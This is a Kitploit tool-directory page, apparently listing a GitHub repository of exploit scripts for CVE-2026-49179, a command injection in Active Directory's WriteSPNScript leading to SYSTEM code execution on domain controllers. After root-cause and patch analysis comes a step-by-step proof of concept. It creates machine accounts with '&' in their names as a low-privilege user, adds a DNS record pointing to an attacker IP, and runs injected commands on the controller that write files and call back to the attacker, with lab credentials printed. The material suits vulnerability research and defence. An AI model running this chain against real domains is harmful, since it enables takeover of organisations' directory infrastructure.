Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-49179-Active-Directory-WriteSPNScript-Command-Injection — Proof-of-concept and exploit scripts for CVE-2026-49179, a command injection in Active Directory's WriteSPNScript function enabling SYSTEM RCE on domain controllers. | Kitploit
도구/GitHubGitHub/overgrowncarrot1/cve-2026-49179-active-directory-writespnscript-command-injection
Privilege EscalationVulnerability AnalysisExploitationPenetration Testing
GitHubovergrowncarrot1/cve-2026-49179-active-directory-writespnscript-command-injection

CVE-2026-49179-Active-Directory-WriteSPNScript-Command-Injection

Proof-of-concept and exploit scripts for CVE-2026-49179, a command injection in Active Directory's WriteSPNScript function enabling SYSTEM RCE on domain controllers.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
114017일 전아직 검토되지 않음
요청한 언어로 콘텐츠를 사용할 수 없습니다. 영어 버전을 표시합니다.

CVE-2026-49179: Active Directory WriteSPNScript Command Injection

Summary

FieldValue
CVE IDCVE-2026-49179
CVSS8.8 (AV:N/AC:L/PR:L/UI:N)
CWECWE-77 (Command Injection)
Affected Componentntdsai.dll — WriteSPNScript function
Affected SystemsWindows Server 2016, 2019, 2022, 2025 (pre-patch)
Attack VectorAuthenticated domain user (any)
ImpactRemote Code Execution as SYSTEM on Domain Controller
PublishedAugust 2026

Vulnerability Description

The WriteSPNScript function in ntdsai.dll generates batch script commands for SPN (Service Principal Name) remediation during Active Directory maintenance operations. The function uses a format string to construct repadmin.exe /writespn commands but fails to sanitize the Distinguished Name (DN) parameter, allowing command injection through the & character (cmd.exe command separator).

The vulnerable format string:

%ws\repadmin.exe /writespn %ws %ws %ws\r\n

Parameters: SystemDir, WriteOp (ADD/DELETE), DN, SPN_value

The DN is derived from the machine account's Common Name (CN), which is set during account creation. When a machine account is created with shell metacharacters in its name, those characters flow unescaped into the generated script. When cmd.exe executes the script, & acts as a command separator, executing attacker-controlled commands as SYSTEM.

Root Cause Analysis

The Validation Gap: SAMR vs LDAP

Active Directory has two primary protocols for managing machine accounts:

ProtocolCharacter ValidationShell Metacharacters
LDAP (SPN values)Strict — CONSTRAINT_ATT_TYPE rejects & ; | ' \ $ ( )`Blocked
SAMR (machine names)Loose — validates basic account name formatAllowed: & ' \ $ ( ) ! space`

This validation asymmetry is the root cause:

  • LDAP SPN validation blocks all dangerous characters in SPN values (dead end for injection via SPN)
  • SAMR account creation allows shell metacharacters in sAMAccountName, which becomes the CN and flows into the DN
  • The DN is passed to WriteSPNScript without sanitization

Vulnerable Code (Base ntdsai.dll)

At address 0x1802a98a0 in the unpatched binary:

void WriteSPNScript(... longlong param_4 /* DN */, longlong *param_5 /* SPNs */, ...)
{
    STRSAFE_LPSTR pszDest;  // ANSI output buffer
    char local_288[47];     // Format: "%ws\repadmin.exe /writespn %ws %ws %ws\r\n"
    WCHAR local_258[264];   // System directory

    GetSystemDirectoryW(local_258, 0x104);

    // Calculate buffer size (sum of all string lengths + overhead)
    uVar4 = len(sysdir) + len(writeop) + len(spn_value) + len(dn) + 0x2f;

    // Allocate and format — NO ESCAPING of DN or SPN parameters
    pszDest = THAlloc_(param_1, 1, uVar4, 1);
    StringCchPrintfA(pszDest, uVar4, local_288, local_258);

    // Write to script file handle
    WriteFile(handle, pszDest, len, &bytesWritten, NULL);
}

StringCchPrintfA formats the DN directly into the output buffer. No escaping, no quoting, no sanitization.

Generated Output (Vulnerable)

For a machine with CN=A&ping attacker&B:

C:\Windows\System32\repadmin.exe /writespn ADD CN=A&ping attacker&B,CN=Computers,DC=domain,DC=local HOST/A&ping attacker&B

cmd.exe interprets this as five separate statements:

#StatementResult
1C:\...\repadmin.exe /writespn ADD CN=AFails (truncated DN)
2ping attackerINJECTED — executes as SYSTEM
3B,CN=Computers,DC=... HOST/AFails (not a valid command)
4ping attackerINJECTED — executes again (from SPN param)
5BFails (not a valid command)

The injected command appears twice — once from the DN parameter and once from the SPN parameter (which also contains the machine name).

Patch Analysis

The patched WriteSPNScript (size: 1477 → 2005 bytes) makes three changes:

1. Escaping Functions Added

Two new sanitization functions applied to both the DN and SPN parameters:

  • EscapeForPowerShellSingleQuote() — escapes ' to prevent breakout from single-quoted strings
  • EscapeForNativeArgvBackslashesBeforeDoubleQuote() — escapes \ sequences before " for native argv parsing

2. Output Format Change

Base (Vulnerable)Patched
FunctionStringCchPrintfA (ANSI)StringCchPrintfW (Wide/Unicode)
QuotingNoneSingle-quoted parameters
Outputrepadmin /writespn ADD DN SPNrepadmin /writespn ADD 'escaped_DN' 'escaped_SPN'

3. Feature Flag Removed

An earlier revision had a feature flag Feature_Servicing_SPN_alias_WRITE_PROP_check_37148918__private_IsEnabled gating the fix. In the final patch, this flag was removed — the fix is always active and cannot be disabled.

Proof of Concept

Test Environment

HostRoleIPOS
WINTERFELLDomain Controller192.168.56.11Windows Server 2019
AttackerKali Linux192.168.14.238Kali 2026
Domainnorth.sevenkingdoms.local
Low-priv usersamwell.tarly / HeartsbaneNormal domain user
Admin userrobb.stark / sexywolfyDomain admin

Step 1: Confirm SAMR Accepts Shell Metacharacters

Using spn_probe3.py, tested which characters SAMR accepts in machine account names vs what LDAP accepts in SPN values:

SAMR Machine Name Character Test (as samwell.tarly):
  [+] ACCEPTED  '   (single quote)     -> INJECT'A$  RID: 1123
  [+] ACCEPTED  `   (backtick)         -> INJECT`A$  RID: 1124
  [+] ACCEPTED  &   (ampersand)        -> INJECT&A$  RID: 1125
  [+] ACCEPTED  $   (dollar sign)      -> INJECT$A$  RID: 1126
  [+] ACCEPTED  (   (left paren)       -> INJECT(A$  RID: 1127
  [+] ACCEPTED  )   (right paren)      -> INJECT)A$  RID: 1128
  [+] ACCEPTED  !   (exclamation)      -> INJECT!A$  RID: 1129
  [+] ACCEPTED  ' ' (space)            -> INJECT A$  RID: 1130

LDAP SPN Validation (all 28 shell metacharacters tested):
  [-] ALL REJECTED with constraintViolation (DSID-033E109C)

Key finding: SAMR allows all 8 shell metacharacters tested. LDAP blocks all of them. The injection vector is through SAMR-created machine names, not through SPN values.

Step 2: Create Injection Machine as Normal Domain User

$ python3 spn_prl_exploit.py 192.168.56.11 \
    -d north.sevenkingdoms.local \
    -u samwell.tarly -p Heartsbane --payload benign

[*] Creating machine via SAMR: 'A&echo POC&B$'
[+] Created A&echo POC&B$, RID: 1137

Also created as samwell.tarly:

[+] Created C&ping a&D$, RID: 1138

Confirmed: normal domain user (PR:L) can create machine accounts with & command injection in the name.

Step 3: Add DNS Record for Callback (as Normal User)

Normal domain users can add ADIDNS records. Used dnstool.py to create a short hostname pointing to the attacker:

python3 dnstool.py -u 'north.sevenkingdoms.local\samwell.tarly' -p 'Heartsbane' \
    -r a.north.sevenkingdoms.local -a add -d 192.168.14.238 192.168.56.11

Verified resolution on DC:

*Evil-WinRM* PS> nslookup a.north.sevenkingdoms.local
Name:    a.north.sevenkingdoms.local
Address:  192.168.14.238

Step 4: Verify Command Injection on DC

Simulating the exact output WriteSPNScript would generate, executed on the DC:

File Write Proof:

*Evil-WinRM* PS> cmd /c "C:\Windows\System32\repadmin.exe /writespn ADD CN=X&echo INJECTED > C:\Windows\Temp\proof.txt&Y,CN=Computers,DC=north,DC=sevenkingdoms,DC=local HOST/test"

*Evil-WinRM* PS> type C:\Windows\Temp\proof.txt
INJECTED

ICMP Callback Proof:

*Evil-WinRM* PS> cmd /c "C:\Windows\System32\repadmin.exe /writespn ADD CN=X&ping -n 3 192.168.14.238&Y,CN=Computers,DC=north,DC=sevenkingdoms,DC=local HOST/test"
도구 다운로드